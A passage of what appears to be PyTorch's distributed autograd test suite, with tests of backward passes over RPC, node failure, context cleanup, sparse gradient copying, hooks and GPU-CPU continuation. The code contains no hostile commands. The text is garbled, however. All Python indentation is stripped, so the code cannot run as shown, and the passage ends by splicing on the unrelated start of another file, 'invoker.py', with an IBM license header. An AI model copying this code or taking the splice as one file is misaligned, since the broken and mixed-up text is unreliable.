t = torch.rand(1, requires_grad=True)
dist_autograd.backward(context_id, [t])
@dist_init
def test_backward_multiple_roots(self):
local_grads = None
t1 = torch.rand((3, 3), requires_grad=True)
t2 = torch.rand((3, 3), requires_grad=True)
for exec_mode in [ExecMode.LOCAL, ExecMode.RPC_SYNC]:
with dist_autograd.context() as context_id:
r1 = self._exec_func(exec_mode, torch.add, t1, t2).sum()
r2 = self._exec_func(exec_mode, torch.mul, t1, t2).sum()
r3 = self._exec_func(exec_mode, torch.cos, t1).sum()
r4 = self._exec_func(exec_mode, torch.div, t1, t2).sum()
local_grads = self._verify_backwards(
exec_mode, [r1, r2, r3, r4], context_id, local_grads, t1, t2
)
@dist_init
def test_backward_different_dtypes(self):
local_grads = None
t1 = torch.rand((3, 3), requires_grad=True, dtype=torch.float32)
t2 = torch.rand((3, 3), requires_grad=True, dtype=torch.float64)
for exec_mode in [ExecMode.LOCAL, ExecMode.REMOTE]:
with dist_autograd.context() as context_id:
loss = self._exec_func(exec_mode, torch.add, t1, t2).sum()
local_grads = self._verify_backwards(
exec_mode, [loss], context_id, local_grads, t1, t2
)
@dist_init
def test_backward_simple_python_udf(self):
# Run the same code locally and with dist autograd and verify gradients
# are same.
local_grads = None
t1 = torch.rand((3, 3), requires_grad=True)
t2 = torch.rand((3, 3), requires_grad=True)
for exec_mode in [ExecMode.LOCAL, ExecMode.REMOTE]:
with dist_autograd.context() as context_id:
ret = self._exec_func(exec_mode, my_py_add, t1, t2)
loss = ret.sum()
local_grads = self._verify_backwards(
exec_mode, [loss], context_id, local_grads, t1, t2
)
@dist_init
def test_backward_simple_script_call(self):
# Run the same code locally and with dist autograd and verify gradients
# are same.
local_grads = None
t1 = torch.rand((3, 3), requires_grad=True)
t2 = torch.rand((3, 3), requires_grad=True)
for exec_mode in [
ExecMode.LOCAL,
ExecMode.RPC_SYNC,
ExecMode.RPC_ASYNC,
ExecMode.REMOTE,
]:
with dist_autograd.context() as context_id:
forward_ret = self._exec_func(exec_mode, my_script_add, t1, t2)
loss = forward_ret.sum()
ret = self._verify_backwards(
exec_mode, [loss], context_id, local_grads, t1, t2
)
local_grads = ret if ret else local_grads
@staticmethod
def _complex_python_udf(t1, t2):
t3 = torch.nn.functional.linear(t1, t2)
t4 = torch.nn.functional.linear(t2, t3)
t5 = torch.nn.functional.linear(t3, t4)
return torch.linalg.multi_dot([t1, t2, t3, t4, t5])
@dist_init
def test_backward_complex_python_udf(self):
# Run the same code locally and with dist autograd and verify gradients
# are same.
local_grads = None
t1 = torch.rand((3, 3), requires_grad=True)
t2 = torch.rand((3, 3), requires_grad=True)
for exec_mode in [ExecMode.LOCAL, ExecMode.REMOTE]:
with dist_autograd.context() as context_id:
ret = self._exec_func(
exec_mode, DistAutogradTest._complex_python_udf, t1, t2
)
loss = ret.sum()
local_grads = self._verify_backwards(
exec_mode, [loss], context_id, local_grads, t1, t2
)
@staticmethod
def _python_udf_with_backward_error(t1, t2):
t3 = t1 + t2
t4 = SimulateBackwardError.apply(t3)
return torch.linalg.multi_dot([t1, t2, t3, t4])
@staticmethod
def _nested_rpc_call_backward_error(t1, t2, dst):
t1 = t1 * t2
t2 = t1 + t2
res = rpc.rpc_sync(
worker_name(dst),
DistAutogradTest._python_udf_with_backward_error,
args=(t1, t2),
)
return torch.linalg.multi_dot([t1, t2, res])
@dist_init
def test_backward_python_udf_error(self):
t1 = torch.rand((3, 3), requires_grad=True)
t2 = torch.rand((3, 3), requires_grad=True)
with dist_autograd.context() as context_id:
loss = rpc.rpc_sync(
worker_name(self._next_rank()),
DistAutogradTest._nested_rpc_call_backward_error,
args=(t1, t2, self._next_rank()),
)
with self.assertRaisesRegex(
RuntimeError, "Simulate error on backward pass"
):
dist_autograd.backward(context_id, [loss.sum()])
_backward_done = False
@dist_init(clean_shutdown=False)
@unittest.skipIf(
IS_MACOS,
"Test is flaky on MacOS since libuv error handling is not as robust as TCP",
)
def test_backward_node_failure_python_udf(self):
# Set a short timeout to quickly time out failed RPCs.
rpc._set_rpc_timeout(5) # 5 seconds
initialize_pg(self.file_init_method, self.rank, self.world_size)
with dist_autograd.context() as context_id:
t1 = torch.rand((3, 3), requires_grad=True)
t2 = torch.rand((3, 3), requires_grad=True)
dst = self._next_rank()
res = rpc.rpc_sync(
worker_name(dst),
my_py_nested_call,
args=(t1, t2, dst, self.world_size, 1),
)
dist.barrier()
# Kill rank 2 (last hop of nested rpc) and verify rank 0 receives an error.
if self.rank == 2:
return
store = dist.distributed_c10d._get_default_store()
if self.rank == 0:
# Wait for rank 2 to die.
shutdown_error_regex = self.get_shutdown_error_regex()
wait_until_node_failure(2, shutdown_error_regex)
# Shutdown sequence is not very well defined and as a result
# we might see any error given by get_shutdown_error_regex().
with self.assertRaisesRegex(RuntimeError, shutdown_error_regex):
# Run backwards, and validate we receive an error since rank 2 is dead.
dist_autograd.backward(context_id, [res.sum()])
# Mark rank 0 is done in the store, since the RPC framework on
# some nodes might be broken at this point (listenLoop() in
# ProcessGroupAgent might've exited).
store.set('test_backward_node_failure_python_udf_rank0_done', "True")
else:
# Wait for backward to finish on rank 0.
store.wait(['test_backward_node_failure_python_udf_rank0_done'], timedelta(seconds=10))
@staticmethod
def _nested_python_udf(t1, t2, dst):
t3 = t1 * t2
t4 = t1 + t2
res = rpc.rpc_sync(worker_name(dst), my_py_add, args=(t3, t4))
return torch.linalg.multi_dot([t1, t2, t3, t4, res])
@dist_init
def test_backwards_nested_python_udf(self):
# Run equivalent of _nested_python_udf locally.
t1 = torch.rand((3, 3), requires_grad=True)
t2 = torch.rand((3, 3), requires_grad=True)
t3 = t1 * t2
t4 = t1 + t2
res = t3 + t4
loss = torch.linalg.multi_dot([t1, t2, t3, t4, res]).sum()
torch.autograd.backward([loss])
# Now run distributed autograd.
with dist_autograd.context() as context_id:
loss = rpc.rpc_sync(
worker_name(self._next_rank()),
DistAutogradTest._nested_python_udf,
args=(t1, t2, self._next_rank()),
)
dist_autograd.backward(context_id, [loss.sum()])
grads = dist_autograd.get_gradients(context_id)
self.assertEqual(t1.grad, grads[t1])
self.assertEqual(t2.grad, grads[t2])
_test_clean_context_backward_context_id = None
class MyBackwardFunc(Function):
@staticmethod
def forward(ctx, input):
return input
@staticmethod
@once_differentiable
def backward(ctx, input):
assert DistAutogradTest._test_clean_context_backward_context_id is not None
# Release the context to simulate error (use barrier before releasing
# context to ensure all nodes execute the backward function).
dist.barrier()
dist_autograd._release_context(
DistAutogradTest._test_clean_context_backward_context_id
)
# Verify all contexts are cleaned up.
assert _all_contexts_cleaned_up()
return input
@dist_init
def test_clean_context_during_backward(self):
"""
This test simulates the situation where the 'backward' call might throw
an exception locally which would lead to the autograd context being
cleaned up if we're using the context manager. As a result, the autograd
context might be cleaned up while some threads are still using the
autograd context.
It is fine for the 'backward' call to throw an exception in this test,
but the process should not crash.
"""
initialize_pg(self.file_init_method, self.rank, self.world_size)
context = dist_autograd._new_context()
context_id = context._context_id()
DistAutogradTest._test_clean_context_backward_context_id = context_id
# Send the context id to all nodes.
for i in range(0, self.world_size):
if i != self.rank:
rank_distance = (i - self.rank + self.world_size) % self.world_size
rpc.rpc_sync(
worker_name(i),
_set_rpc_done,
args=(context_id, rank_distance),
)
dist.barrier()
# Verify all context ids have been received.
self.assertEqual(self.world_size - 1, len(known_context_ids))
t1 = torch.rand((3, 3), requires_grad=True)
for i in range(0, 100):
dst = self._next_rank()
t1 = rpc.rpc_sync(worker_name(dst), torch.add, args=(t1, t1))
# Call MyBackwardFunc as the first op of the backward pass to
# ensure we release the context early in the backward pass.
t1 = DistAutogradTest.MyBackwardFunc.apply(t1)
self.assertEqual(100, len(context._send_functions()))
context_id = 100 # dummy context_id
with self.assertRaisesRegex(
RuntimeError,
"Could not find autograd context with id: {}".format(context_id),
):
dist_autograd.backward(context_id, [t1.sum()])
# HACK: Killing workers since otherwise the autograd engine gets stuck on
# other nodes. The proper fix would be addressing:
# https://github.com/pytorch/pytorch/issues/27643, which would inform
# other nodes about the failure.
# The autograd engine gets stuck on other nodes since they're waiting to
# receive gradients from the node that received an error (and as a
# result it didn't execute the rest of the graph).
dist.barrier()
rpc.shutdown(graceful=False)
sys.exit(0)
@classmethod
def _call_remote_embedding(cls, embedding_rref, input, offsets, per_sample_weights):
embedding = embedding_rref.local_value()
return embedding(input, offsets, per_sample_weights)
@classmethod
def _get_grad(cls, embedding_rref, context_id):
embedding = embedding_rref.local_value()
grad_map = dist_autograd.get_gradients(context_id)
# Can't send sparse tensors over RPC: https://github.com/pytorch/pytorch/issues/30807
return grad_map[embedding.weight].to_dense()
@dist_init
def test_embedding_bag_with_no_grad_tensors(self):
dst = self._next_rank()
remote_embedding = rpc.remote(
worker_name(dst),
torch.nn.EmbeddingBag,
args=(16, 16),
kwargs={"mode": "sum", "sparse": True},
)
local_embedding = torch.nn.EmbeddingBag(16, 16, mode="sum", sparse=True)
input = torch.LongTensor([1, 2, 4, 5, 4, 3, 2, 9])
# requires_grad = True to record send/recv functions
per_sample_weights = torch.rand((8), requires_grad=True)
offsets = torch.LongTensor([0, 4])
local_res = local_embedding(input, offsets, per_sample_weights)
# Run backward twice.
torch.autograd.backward([local_res.sum()], retain_graph=True)
torch.autograd.backward([local_res.sum()])
local_grad = local_embedding.weight.grad
with dist_autograd.context() as context_id:
res = rpc.rpc_sync(
worker_name(dst),
DistAutogradTest._call_remote_embedding,
args=(remote_embedding, input, offsets, per_sample_weights),
)
# Run backward twice to test accumulation of sparse gradients.
dist_autograd.backward(context_id, [res.sum()], retain_graph=True)
dist_autograd.backward(context_id, [res.sum()])
remote_grad = rpc.rpc_sync(
worker_name(dst),
DistAutogradTest._get_grad,
args=(remote_embedding, context_id),
)
self.assertEqual(local_grad.to_dense(), remote_grad)
@classmethod
def _mixed_requires_grad(cls, t1, t2):
if t2.requires_grad:
return t1 - t2
else:
return t1 * t2
@dist_init
def test_mixed_requires_grad(self):
for exec_mode in [ExecMode.RPC_SYNC, ExecMode.REMOTE]:
t1 = torch.rand((3, 3), requires_grad=True)
t2 = torch.rand((3, 3), requires_grad=False)
with dist_autograd.context() as context_id:
ret = self._exec_func(
exec_mode, DistAutogradTest._mixed_requires_grad, t1, t2
)
self.assertEqual(t1 * t2, ret)
dist_autograd.backward(context_id, [ret.sum()])
self.assertTrue(t1.requires_grad)
self.assertFalse(t2.requires_grad)
grads = dist_autograd.get_gradients(context_id)
self.assertIn(t1, grads)
self.assertNotIn(t2, grads)
self.assertEqual(t2, grads[t1])
class TestDebugInfoFunc(Function):
@staticmethod
def forward(ctx, input):
return input
@staticmethod
@once_differentiable
def backward(ctx, input):
debug_info = dist_autograd._get_debug_info()
assert debug_info is not None
backward_passes = int(debug_info["num_current_backward_passes"])
# Hard to validate exact numbers because of the distributed nature.
# We can't use a barrier() here since that would block the single
# CPU thread available for autograd and can cause deadlocks.
assert backward_passes >= 1 and backward_passes <= 4
return input
@dist_init
def test_debug_info(self):
initialize_pg(self.file_init_method, self.rank, self.world_size)
t1 = torch.rand((3, 3), requires_grad=True)
t2 = torch.rand((3, 3), requires_grad=True)
with dist_autograd.context() as context_id:
i = 0
res = {}
res[i] = t1
for rank in range(self.world_size):
if rank != self.rank:
res[i + 1] = rpc.rpc_sync(
worker_name(rank), torch.add, args=(res[i], t2)
)
i += 1
# Call custom function in middle of backward pass to ensure all
# nodes are still waiting on a backward().
res[i + 1] = DistAutogradTest.TestDebugInfoFunc.apply(res[i])
i += 1
for rank in range(self.world_size):
if rank != self.rank:
res[i + 1] = rpc.rpc_sync(
worker_name(rank), torch.add, args=(res[i], t2)
)
i += 1
dist_autograd.backward(context_id, [res[i].sum()])
debug_info = dist_autograd._get_debug_info()
num_autograd_context = int(debug_info["num_autograd_contexts"])
# Need atleast one context and not more than 4.
self.assertTrue(num_autograd_context >= 1 and num_autograd_context <= 4)
for rd in range(self.world_size - 1):
rpc.rpc_sync(
worker_name((self.rank + rd + 1) % self.world_size),
_set_rpc_done,
args=(context_id, rd + 1),
)
dist.barrier()
# Validate information
debug_info = dist_autograd._get_debug_info()
assert debug_info is not None
self.assertEqual(0, int(debug_info["num_current_backward_passes"]))
# only have `num_current_backward_passes` and `num_autograd contexts`
self.assertTrue(len(debug_info) == 2)
self.assertTrue(_all_contexts_cleaned_up())
# All contexts should be cleaned up.
debug_info = dist_autograd._get_debug_info()
self.assertEqual(0, int(debug_info["num_autograd_contexts"]))
@staticmethod
def _workload_thread():
t1 = torch.rand((3, 3), requires_grad=True)
t2 = torch.rand((3, 3), requires_grad=True)
with dist_autograd.context() as context_id:
t3 = rpc.rpc_sync("worker0", torch.add, args=(t1, t2))
t4 = rpc.rpc_sync("worker0", torch.mul, args=(t2, t3))
t5 = rpc.rpc_sync("worker0", torch.matmul, args=(t3, t4))
t6 = rpc.rpc_sync("worker0", torch.add, args=(t4, t5))
dist_autograd.backward(context_id, [t6.sum()])
@dist_init
def test_async_dist_autograd(self):
"""
This test ensures async processing for distributed autograd works
appropriately. This is achieved by spawning multiple threads and
hammering a single node with a lot of backward() calls.
"""
initialize_pg(self.file_init_method, self.rank, self.world_size)
if self.rank != 0:
# All other ranks schedule work on rank 0.
threads = []
for i in range(20):
t = threading.Thread(target=DistAutogradTest._workload_thread)
t.start()
threads.append(t)
for thread in threads:
thread.join()
dist.barrier()
@dist_init
def test_backward_accumulate_grads(self):
t1 = torch.rand((3, 3), requires_grad=True)
t2 = torch.rand((3, 3), requires_grad=True)
with dist_autograd.context() as context_id:
t3 = torch.matmul(t1, t2)
# Run backward twice.
torch.autograd.backward([t3.sum()], retain_graph=True)
torch.autograd.backward([t3.sum()])
t3 = rpc.rpc_sync(
worker_name(self._next_rank()), torch.matmul, args=(t1, t2)
)
# Run backward twice.
dist_autograd.backward(context_id, [t3.sum()], retain_graph=True)
dist_autograd.backward(context_id, [t3.sum()])
# Verify the gradients are same for local and remote execution.
grads = dist_autograd.get_gradients(context_id)
self.assertEqual(2, len(grads))
self.assertIn(t1, grads)
self.assertIn(t2, grads)
self.assertEqual(t1.grad, grads[t1])
self.assertEqual(t2.grad, grads[t2])
@staticmethod
def _test_nested_backward_accumulate_grads(t1, t2, dst_rank):
return rpc.rpc_sync(worker_name(dst_rank), torch.matmul, args=(t1, t2))
@dist_init
def test_nested_backward_accumulate_grads(self):
t1 = torch.rand((3, 3), requires_grad=True)
t2 = torch.rand((3, 3), requires_grad=True)
with dist_autograd.context() as context_id:
loss = rpc.rpc_sync(
worker_name(self._next_rank()),
DistAutogradTest._test_nested_backward_accumulate_grads,
args=(t1, t2, self._next_rank()),
).sum()
# Run backward twice.
dist_autograd.backward(context_id, [loss], retain_graph=True)
dist_autograd.backward(context_id, [loss])
@dist_init
def test_multiple_backward(self):
t1 = torch.rand((3, 3), requires_grad=True)
t2 = torch.rand((3, 3), requires_grad=True)
with dist_autograd.context() as context_id:
loss = rpc.rpc_sync(
worker_name(self._next_rank()),
torch.add,
args=(t1, t2)).sum()
# Run backward in a loop multiple times.
for i in range(1000):
dist_autograd.backward(context_id, [loss], retain_graph=True)
@dist_init(clean_shutdown=False)
def test_multiple_backward_with_errors(self):
initialize_pg(self.file_init_method, self.rank, self.world_size)
t1 = torch.rand((3, 3), requires_grad=True)
t2 = torch.rand((3, 3), requires_grad=True)
with dist_autograd.context() as context_id:
loss = rpc.rpc_sync(
'worker{}'.format(self._next_rank()),
DistAutogradTest._python_udf_with_backward_error,
args=(t1, t2)).sum()
try:
# Run backward in a loop multiple times.
for i in range(100):
if i < 50:
with self.assertRaisesRegex(RuntimeError, "Simulate error on backward pass"):
dist_autograd.backward(context_id, [loss], retain_graph=True)
elif i > 50:
# Recovered from error.
dist_autograd.backward(context_id, [loss], retain_graph=True)
else:
dist.barrier()
SimulateBackwardError._simulate_error = False
dist.barrier()
finally:
# Sync before resetting flag.
dist.barrier()
# Reset the flag.
SimulateBackwardError._simulate_error = True
@dist_init
def test_backward_verify_hooks(self):
t1 = torch.ones((3, 3), requires_grad=True)
# Double the gradient.
t1.register_hook(lambda grad: grad * 2)
t2 = torch.ones((3, 3), requires_grad=True)
local_grads = None
for exec_mode in [ExecMode.LOCAL, ExecMode.RPC_SYNC, ExecMode.REMOTE]:
with dist_autograd.context() as context_id:
ret = self._exec_func(exec_mode, torch.matmul, t1, t2)
loss = ret.sum()
ret = self._verify_backwards(
exec_mode, [loss], context_id, local_grads, t1, t2
)
local_grads = ret if ret else local_grads
@dist_init
def test_no_grad_copy(self):
'''
Similar to test in test_autograd.py.
'''
# create autograd function that saves grad pointer as class static
class MyFunc(Function):
static_grad_ptr = None
@staticmethod
def forward(ctx, inp1, inp2):
return inp1 + inp2
@staticmethod
def backward(ctx, grad):
MyFunc.static_grad_ptr = grad.data_ptr()
return grad, grad
class MyFuncSingleGrad(Function):
static_grad_ptr = None
@staticmethod
def forward(ctx, inp):
return inp
@staticmethod
def backward(ctx, grad):
MyFuncSingleGrad.static_grad_ptr = grad.data_ptr()
return grad
class NonContGradFunc(Function):
@staticmethod
def forward(ctx, inp1):
ctx.size = inp1.size()
return torch.tensor([1.])
@staticmethod
def backward(ctx, grad):
return torch.ones(1).expand(ctx.size)
a = torch.randn(5, 6, requires_grad=True)
b = torch.randn(5, 6, requires_grad=True)
# non-contiguous grad should be copied
with dist_autograd.context() as context_id:
dist_autograd.backward(context_id, [NonContGradFunc.apply(MyFunc.apply(a, b))])
grads = dist_autograd.get_gradients(context_id)
self.assertFalse(grads[a].data_ptr() == MyFunc.static_grad_ptr)
self.assertFalse(grads[b].data_ptr() == MyFunc.static_grad_ptr)
# test case that should trigger no copy for a
with dist_autograd.context() as context_id:
dist_autograd.backward(context_id, [MyFuncSingleGrad.apply(a)[1][0]])
grads = dist_autograd.get_gradients(context_id)
p_g = MyFuncSingleGrad.static_grad_ptr
p_a = grads[a].data_ptr()
# Verify there was no clone.
self.assertTrue(p_a == p_g)
# Test case that should trigger copy for both of a,b. This is
# different in the distributed autograd case since we hold
# a reference to all grads in a vector until all accumulation is done.
with dist_autograd.context() as context_id:
dist_autograd.backward(context_id, [MyFunc.apply(a, b)[1][0]])
grads = dist_autograd.get_gradients(context_id)
p_g = MyFunc.static_grad_ptr
p_a = grads[a].data_ptr()
p_b = grads[b].data_ptr()
# check a,b uses different grad buffer
self.assertFalse(p_a == p_b)
# both should be copied.
self.assertFalse(grads[a].data_ptr() == MyFunc.static_grad_ptr)
self.assertFalse(grads[b].data_ptr() == MyFunc.static_grad_ptr)
@dist_init
def test_no_grad_copy_sparse(self):
# create autograd function that saves grad pointer as class static
class MyFunc(Function):
static_grad_ptr = None
@staticmethod
def forward(ctx, inp):
return inp
@staticmethod
def backward(ctx, grad):
MyFunc.static_grad_ptr = grad._values().data_ptr()
return grad
class NonContGradFunc(Function):
static_grad_ptr = None
@staticmethod
def forward(ctx, inp1, inp2):
return inp1 + inp2
@staticmethod
def backward(ctx, grad):
# Create a sparse tensor with non-contigous indices and values
# and return as grad.
v = torch.rand(1, 3)
i = torch.ones(1, 1, dtype=torch.long)
nv = v.expand(8, 3)
ni = i.expand(1, 8)
ngrad = torch.sparse.FloatTensor(ni, nv, torch.Size([10, 3]))
NonContGradFunc.static_grad_ptr = ngrad._values().data_ptr()
return ngrad, ngrad
a = torch.randn(10, 3, requires_grad=True)
b = torch.randn(10, 3, requires_grad=True)
input = torch.tensor([1, 2, 4, 5, 4, 3, 2, 9])
offsets = torch.tensor([0, 4])
import torch.nn.functional as F
# test case that should trigger no copy for a.
with dist_autograd.context() as context_id:
emb_matrix = MyFunc.apply(a)
loss = F.embedding_bag(emb_matrix, input, offsets, sparse=True).sum()
dist_autograd.backward(context_id, [loss], retain_graph=True)
grads = dist_autograd.get_gradients(context_id)
p_g = MyFunc.static_grad_ptr
p_a = grads[a]._values().data_ptr()
# check a uses the same buffer
self.assertTrue(p_a == p_g)
# Run backwards multiple times.
for i in range(10):
dist_autograd.backward(context_id, [loss], retain_graph=True)
# non-contiguous indices and value, we should trigger a copy.
with dist_autograd.context() as context_id:
emb_matrix = NonContGradFunc.apply(a, b)
loss = F.embedding_bag(emb_matrix, input, offsets, sparse=True).sum()
dist_autograd.backward(context_id, [loss], retain_graph=True)
grads = dist_autograd.get_gradients(context_id)
p_g = NonContGradFunc.static_grad_ptr
p_a = grads[a]._values().data_ptr()
p_b = grads[b]._values().data_ptr()
# check a,b uses different grad buffer
self.assertFalse(p_a == p_b)
# Verify we cloned both grads.
self.assertFalse(p_a == p_g)
self.assertFalse(p_b == p_g)
# Run backwards multiple times to verify accumulation.
for i in range(10):
dist_autograd.backward(context_id, [loss], retain_graph=True)
@dist_init
def test_grad_copy_sparse_indices_extra_ref(self):
# create autograd function that saves grad pointer as class static
class MyFunc(Function):
static_grad_ptr = None
static_grad_indices_ref = None
static_grad_values_ref = None
@staticmethod
def forward(ctx, inp):
return inp
@staticmethod
def backward(ctx, grad):
MyFunc.static_grad_ptr = grad._values().data_ptr()
# indices() and values() return views, so holding onto
# references of them would not increment refcount of indices
# and values inside the sparse tensor.
MyFunc.static_grad_indices_ref = grad._indices()
MyFunc.static_grad_values_ref = grad._values()
return grad
a = torch.randn(10, 3, requires_grad=True)
input = torch.tensor([1, 2, 4, 5, 4, 3, 2, 9])
offsets = torch.tensor([0, 4])
import torch.nn.functional as F
with dist_autograd.context() as context_id:
emb_matrix = MyFunc.apply(a)
loss = F.embedding_bag(emb_matrix, input, offsets, sparse=True).sum()
dist_autograd.backward(context_id, [loss], retain_graph=True)
grads = dist_autograd.get_gradients(context_id)
p_g = MyFunc.static_grad_ptr
p_a = grads[a]._values().data_ptr()
self.assertIsNotNone(MyFunc.static_grad_indices_ref)
self.assertIsNotNone(MyFunc.static_grad_values_ref)
# grad would be stolen, since static_grad_indices_ref and
# static_grad_values_ref are holding onto views and don't bump the
# refcount.
self.assertTrue(p_g == p_a)
@dist_init
def test_post_hooks(self):
self.hook_called_times = 0
def post_hook_add_one(output_grads, input_grads):
self.hook_called_times += 1
return output_grads
def post_hook_add_two(output_grads, input_grads):
self.hook_called_times += 2
return output_grads
t = torch.rand(10, 10, requires_grad=True)
a = t + t
# Register post hooks
accumulate_grad_0 = a.grad_fn.next_functions[0][0]
accumulate_grad_0.register_hook(post_hook_add_one)
accumulate_grad_0.register_hook(post_hook_add_two)
accumulate_grad_1 = a.grad_fn.next_functions[1][0]
accumulate_grad_1.register_hook(post_hook_add_two)
with dist_autograd.context() as context_id:
loss = a.sum()
dist_autograd.backward(context_id, [loss])
self.assertEqual(5, self.hook_called_times)
grads = dist_autograd.get_gradients(context_id)
self.assertEqual(1, len(grads))
self.assertTrue(t in grads)
@staticmethod
def _slow_add(t1, t2):
time.sleep(1)
t3 = t1 + t2
t3.requires_grad = True
return t3
@dist_init
def test_thread_local_context_id(self):
t1 = torch.rand((3, 3))
t2 = torch.rand((3, 3))
t3 = t1 + t2
t3.requires_grad = True
t3.sum().backward()
dst = worker_name((self.rank + 1) % self.world_size)
rref = rpc.remote(dst, DistAutogradTest._slow_add, args=(t1, t2))
with dist_autograd.context() as context_id:
loss = rref.to_here().sum()
# due to slow add, the continuation of this backward pass will be
# invoked by the previous rpc.remote thread which does not have a
# valid context_id. So, this can test whether we propagate
# thread_local states properly when jumping across threads on the
# server side.
dist_autograd.backward(context_id, [loss])
self.assertTrue(
rpc.rpc_sync(
dst,
_compare_owner_value,
args=(context_id, rref, t3.grad)
)
)
@skip_if_lt_x_gpu(1)
@dist_init
def test_gpu_simple(self):
t1 = torch.rand(3, 3, requires_grad=True, device="cuda:0")
t2 = torch.rand(3, 3, requires_grad=True, device="cuda:0")
(t1 + t2).sum().backward()
with dist_autograd.context() as context_id:
t3 = t1 + t2
dist_autograd.backward(context_id, [t3.sum()])
grads = dist_autograd.get_gradients(context_id)
self.assertEqual(2, len(grads))
self.assertEqual(t1.grad, grads[t1])
self.assertEqual(t2.grad, grads[t2])
@skip_if_lt_x_gpu(1)
@dist_init
def test_gpu_to_cpu_continuation(self):
t1 = torch.rand(3, 3, requires_grad=True, device="cuda:0")
t2 = torch.rand(3, 3, requires_grad=True)
# Run a few iterations.
for i in range(3):
t1.grad = None
t2.grad = None
# Root is CPU
local_grads = None
for exec_mode in [ExecMode.LOCAL, ExecMode.RPC_SYNC]:
with dist_autograd.context() as context_id:
t3 = self._exec_func(exec_mode, torch.add, t2, t2)
t4 = t3.cuda(0) + t1
t5 = self._exec_func(exec_mode, torch.add, t4.cpu(), t2)
t6 = t5.cuda(0) + t4
t7 = self._exec_func(exec_mode, torch.add, t6.cpu(), t5)
# Autograd graph consists of CPU -> GPU -> CPU execution.
ret = self._verify_backwards(
exec_mode, [t7.sum()], context_id, local_grads, t1, t2
)
local_grads = ret if ret else local_grads
@skip_if_lt_x_gpu(1)
@dist_init
def test_gpu_to_cpu_continuation_gpu_root(self):
t1 = torch.rand(3, 3, requires_grad=True, device="cuda:0")
t2 = torch.rand(3, 3, requires_grad=True)
# Run a few iterations.
for i in range(3):
t1.grad = None
t2.grad = None
# Root is CPU
local_grads = None
for exec_mode in [ExecMode.LOCAL, ExecMode.RPC_SYNC]:
with dist_autograd.context() as context_id:
t3 = self._exec_func(exec_mode, torch.add, t2, t2)
t4 = t3.cuda(0) + t1
t5 = self._exec_func(exec_mode, torch.add, t4.cpu(), t2)
t6 = t5.cuda(0) + t4
# Autograd graph consists of CPU -> GPU -> CPU execution.
ret = self._verify_backwards(
exec_mode, [t6.sum()], context_id, local_grads, t1, t2
)
local_grads = ret if ret else local_grads
class FaultyAgentDistAutogradTest(RpcAgentTestFixture):
# Reusing a simplified helper function from DistAutogradTest to ensure
# autograd context is successfully cleaned up even when RPCs are failing.
def context_cleanup_test_helper(self, rpc_args, func):
initialize_pg(self.file_init_method, self.rank, self.world_size)
# test that in dist autograd, in the case that tensors communicated over RPC do
# NOT require grad, we still cleanup the dist autograd contexts created
# on other nodes. This is because the autograd context is still
# communicated over RPC even if tensor arguments do not require grad, as
# it is possible that the response could.
dst_ranks = {rank for rank in range(self.world_size) if rank != self.rank}
with dist_autograd.context() as context_id:
for dst_rank in dst_ranks:
rpc.rpc_sync(worker_name(dst_rank), func, args=rpc_args)
rpc.rpc_sync(
worker_name(dst_rank), _set_rpc_done, args=(context_id, 1)
)
# the thread's context id should be cleaned up
with self.assertRaises(RuntimeError):
dist_autograd._retrieve_context(context_id)
# Ensure all peers have finished mutating the
# `known_context_ids` set.
dist.barrier()
# check that all contexts have been cleaned up.
success = _all_contexts_cleaned_up()
self.assertTrue(success)
# no faulty_messages defined so this fails all retryable messages - see
# faulty_rpc_agent_test_fixture.py for the list of retryable messages.
@dist_init
def test_context_cleanup_tensor_with_grad(self):
t1 = torch.ones(3, 3, requires_grad=True)
t2 = torch.zeros(3, 3, requires_grad=True)
self.context_cleanup_test_helper(rpc_args=(t1, t2), func=torch.add)
@dist_init
def test_verify_backend_options(self):
self.assertEqual(self.rpc_backend, rpc.backend_registry.BackendType.FAULTY_PROCESS_GROUP)
self.assertEqual(self.rpc_backend_options.num_send_recv_threads, 8)
self.assertEqual(self.rpc_backend_options.num_fail_sends, 3)
self.assertEqual(len(self.rpc_backend_options.messages_to_fail), 4)
class TensorPipeDistAutogradTest(RpcAgentTestFixture):
@skip_if_lt_x_gpu(4)
def test_device_maps_backward_pass(self):
options = self.rpc_backend_options
dst = worker_name((self.rank + 1) % self.world_size)
# The reverse of this device mapping should be used for the backward pass.
options.set_device_map(dst, {self.rank: (self.rank + 1) % self.world_size})
rpc.init_rpc(
name=worker_name(self.rank),
backend=self.rpc_backend,
rank=self.rank,
world_size=self.world_size,
rpc_backend_options=options,
)
t1 = torch.rand(10, device=self.rank, requires_grad=True)
t2 = torch.rand(10, device=self.rank, requires_grad=True)
with dist_autograd.context() as context_id:
res = rpc.rpc_sync(dst, torch.add, args=(t1, t2))
dist_autograd.backward(context_id, [res.sum()])
grads = dist_autograd.get_gradients(context_id)
self.assertEqual(torch.ones(10), grads[t1])
self.assertEqual(torch.ones(10), grads[t2])
self.assertEqual(t1.device, grads[t1].device)
self.assertEqual(t2.device, grads[t2].device)
rpc.shutdown()
class MyRemoteCompute(torch.nn.Module):
def __init__(self):
super().__init__()
def forward(self, input):
input = input * 2.0
return input
class MyLocalCompute(torch.nn.Module):
def __init__(self, next_stage):
super().__init__()
self.next_stage = next_stage
def forward(self, input):
return self.next_stage.rpc_sync().forward(input)
@skip_if_lt_x_gpu(4)
def test_dist_autograd_sync_streams(self):
options = self.rpc_backend_options
dst = worker_name((self.rank + 1) % self.world_size)
# The reverse of this device mapping should be used for the backward pass.
options.set_device_map(dst, {self.rank: (self.rank + 1) % self.world_size})
rpc.init_rpc(
name=worker_name(self.rank),
backend=self.rpc_backend,
rank=self.rank,
world_size=self.world_size,
rpc_backend_options=options,
)
remote_compute = rpc.remote(dst, TensorPipeDistAutogradTest.MyRemoteCompute)
local_compute = TensorPipeDistAutogradTest.MyLocalCompute(remote_compute)
for _ in range(10):
input = torch.rand([1000, 10000], device=self.rank, requires_grad=True)
# Run local autograd
result = input * 2.0
r = random.random()
loss = result.sum() * r
loss.backward()
# Run distributed autograd
with dist_autograd.context() as context_id:
result = local_compute(input)
loss = result.sum() * r
dist_autograd.backward(context_id, [loss])
# Compare grads.
grads = dist_autograd.get_gradients(context_id)
self.assertEqual(input.grad, grads[input])
rpc.shutdown()
|
invoker.py
|
#
# (C) Copyright IBM Corp. 2019
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
